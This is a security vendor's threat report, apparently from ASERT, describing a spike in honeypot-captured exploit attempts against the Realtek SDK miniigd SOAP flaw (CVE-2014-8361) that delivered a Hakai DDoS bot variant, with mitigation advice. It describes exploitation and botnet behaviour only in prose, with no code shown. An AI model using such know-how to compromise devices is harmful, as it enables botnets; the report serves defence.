Realtek SDK Exploits on the Rise from Egypt

Executive Summary 

ASERT’s IoT honeypot network continuously monitors known exploit vectors and we recently detected a spike in exploit attempts targeting the Realtek SDK miniigd SOAP vulnerability in consumer-based routers from the end of April 2019 until the first half of May 2019. The attacks originated from Egypt and, based on the volume of exploit attempts against South African routers, appears targeted. The payload includes commands to download and execute a variant of the Hakai DDoS bot.

Key Findings 

• A 5,043% increase in exploit attempts (Figure 1), sourced from Egypt between April 22, 2019 - May 10, 2019, appeared to primarily target consumer-based routers in South Africa.
• The exploitation attempts focus on IoT devices vulnerable to a remote command execution exploit in the Realtek SDK miniigd SOAP service (CVE-2014-8361).
• The payload delivered to compromised devices is a variant of the Hakai DDoS bot, which can be used to conduct HTTP, TCP, UDP based DDoS attacks.

Details 

IoT malware authors use exploits to aid in its ability to propagate to as many devices as possible. Exploits leveraged within IoT malware range from newly discovered to several years old, as discussed in Fast & Furious IoT Botnets: Regifting Exploits. To track exploits attempts, our IoT honeypots monitor for connections attempting to exploit known vulnerabilities within IoT devices.

By monitoring the number of unique sources observed from our honeypots, we can approximate the number of locations and devices likely infected with IoT malware. Data collected between April 1st through May 10, 2019, indicates a significant increase (Figure 1) in exploit attempts for the Realtek SDK miniigd SOAP vulnerability. Drilling further into the sources of the exploit attempts, 86.2% of the attack traffic originated from Egypt.

The majority of the exploit activity was logged by our South African honeypot (Figure 2).

IoT devices using the Realtek SDK miniigd SOAP service are vulnerable (CVE-2014-8361) to remote command execution attacks. If compromised, attackers can download and execute malicious code on the devices. Figure 3 shows a sample of an exploit attempt captured by our honeypot network. The reason we see the delivery of the “mips” binary is due to the architecture the exploit is targeting.

The C2 delivering the malicious payload also contained an installer script (Figure 4) which is commonly used by several IoT based malware families. Within the download script we find support for several other architectures used by IoT devices. The installer script can be combined with other exploits as described in Fast & Furious IoT Botnets: Regifting Exploits to exploit vulnerable IoT devices.

After reverse engineering the “mips” binary captured by our honeypot, we believe it is a variant of the Hakai IoT DDoS bot compiled for the MIPS architecture and capable of communication with an attacker controlled C2 (Figure 5).

Hakai is an IoT DDoS bot that has been around since 2018 and is based off the Gafgyt family of IoT malware. Hakai uses several command injection vulnerabilities and supports the following DDoS capabilities: HTTP flooding, TCP flooding, UDP flooding.  The Hakai variants hosted on the C2 includes a new vseattack function, which performs a Valve Source Engine (VSE) query-flooding attack similar the one found in Mirai.

Conclusion 

Based on our research we continue to see a significant rise in the number of exploit attempts targeting IoT devices around the world. Typically, new IoT devices introduced onto the internet will, on average, see exploitation attempts of this nature within twenty-four hours of going online. We believe activity like this is a coordinated effort to recruit more bots. Though we do not know the motivations behind the surge in activity or the interest in South Africa, we believe this is only the preliminary phase as the actors behind the exploitation attempts seek to expand their botnet. ASERT will continue to monitor this activity and the broader landscape for malicious activity targeting IoT devices. In the meantime, we recommend patching known vulnerable devices to mitigate the threat.

Indicators of Compromise: